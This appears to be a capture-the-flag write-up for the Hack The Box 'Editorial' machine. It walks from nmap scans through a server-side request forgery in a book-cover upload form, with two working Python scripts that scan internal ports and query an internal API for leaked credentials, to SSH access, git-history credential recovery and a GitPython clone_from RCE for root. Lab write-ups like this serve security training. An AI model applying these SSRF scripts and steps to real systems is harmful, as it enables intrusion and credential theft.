Editorial

October 19, 2024

---

Created by	Page	Difficulty	OS
Lanz	Hack The Box	Easy	Linux

---

• I start with a scan of the open ports,

    nmap -p- -vvv -sS --min-rate 2000 -Pn 10.10.11.20 -oG scan
  

  

• I continue with a scan of the versions and technologies that are running on the open ports that we have found

    nmap -p22,80 -sCV 10.10.11.20 -oN ports
  

  

• I found the domain editorial.htb and add it to the file in the /etc/hosts file

• I look at what technologies they are using on the website.

    whatweb 10.10.11.20 
    whatweb editorial.htb
  

  

  

• Browsing the web I find a page that allows us to upload a file. I can upload files but they are not interpreted.

  

  

• As I see that the url returned changes depending on whether the file has been uploaded or not, I decide to perform a scan in case it has open ports that are not accessible from the outside.

  

  

• I create a script to automate the recognition and to show me the open ports according to the length of the response.

    #!/usr/bin/python3
    import requests
    import os
    import signal
    import time
    from pwn import *
      
    def def_handler(sig, frame):
    	print("\n\n[!]Saliendo....\n")
    	sys.exit(1)
      
    signal.signal(signal.SIGINT, def_handler)
      
    def scanPorts():
    	burp0_url = "http://editorial.htb:80/upload-cover"
    	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Content-Disposition": "inline", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "multipart/form-data; boundary=---------------------------134859763814168705221183954404", "Origin": "http://editorial.htb", "Connection": "keep-alive", "Referer": "http://editorial.htb/upload"}
    	openPorts = ""
    	p2 = log.progress("Ports open")
    	p1 = log.progress("Scanning port")
    	for port in range(1, 65535):
    		burp0_data = f"-----------------------------134859763814168705221183954404\r\nContent-Disposition: form-data; name=\"bookurl\"\r\n\r\nhttp://127.0.0.1:{port}\r\n-----------------------------134859763814168705221183954404\r\nContent-Disposition: form-data; name=\"bookfile\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------134859763814168705221183954404--\r\n"
    		response = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
    		lon = len(response.text)
    		p1.status(port)
    		if (lon != 61):
    			if (openPorts == ""):
    				openPorts = port
    			else:
    				openPorts += f",{port}"
    			p2.status(openPorts)
      
    if __name__ == '__main__':
    	scanPorts()
      
  

• I find that port 5000 is open internally

  

• I look at the response it gives me when attacking against that port

  

• When displaying the content of the response we see that we are dealing with an API. I modify the script so that it shows us the content of the queries directly and I begin to investigate the answers of the different endpoints.

    #!/usr/bin/python3
    import requests
    import os
    import signal
    import time
    import json
    from pwn import *
      
    def def_handler(sig, frame):
    	print("\n\n[!]Saliendo....\n")
    	sys.exit(1)
      
    signal.signal(signal.SIGINT, def_handler)
      
    url = "http://127.0.0.1:5000/api/latest/metadata/messages/authors"
      
    def scanPorts():
    	burp0_url = "http://editorial.htb:80/upload-cover"
    	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Content-Disposition": "inline", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "multipart/form-data; boundary=---------------------------134859763814168705221183954404", "Origin": "http://editorial.htb", "Connection": "keep-alive", "Referer": "http://editorial.htb/upload"}
    	p1 = log.progress("URL")
    	p1.status(url)
    	burp0_data = f"-----------------------------134859763814168705221183954404\r\nContent-Disposition: form-data; name=\"bookurl\"\r\n\r\n{url}\r\n-----------------------------134859763814168705221183954404\r\nContent-Disposition: form-data; name=\"bookfile\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------134859763814168705221183954404--\r\n"
    	response = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
    	urlRequest = "http://editorial.htb/"+response.text
      
    	response2 = requests.get(urlRequest)
    	print(response2.text)
      
    if __name__ == '__main__':
    	scanPorts()
      
  

• When testing the endpoint authors encountered some potential credentials. I try to connect by ssh with those credentials and I get access and read the first flag

  

  

• I find that the user prod

  

• When searching for files in the system I find a git repository in /opt/apps

  

• I mount a web server on port 8000 with python3 -m http.server to download to my machine this repository with git-dumper and then with extractor retrieve the contents of the files in each commit.

  git-dumper

  extractor.sh

  

  

• When I check the messages of each commit, I see app_api/app.py in the file I had and I find another credential with which I can switch user

  

  

• Looking at the commands that I can run as another user without providing a password I find that I can run as root a file

  

  

• After trying to do python Library Hijacking and getting nothing, I search for vulnerabilities in the clone_from function and find a CVE that allows Remote Code Execution (RCE). Thanks to this I manage to execute a command as root, I become this user and I manage to read the second flag.

  https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858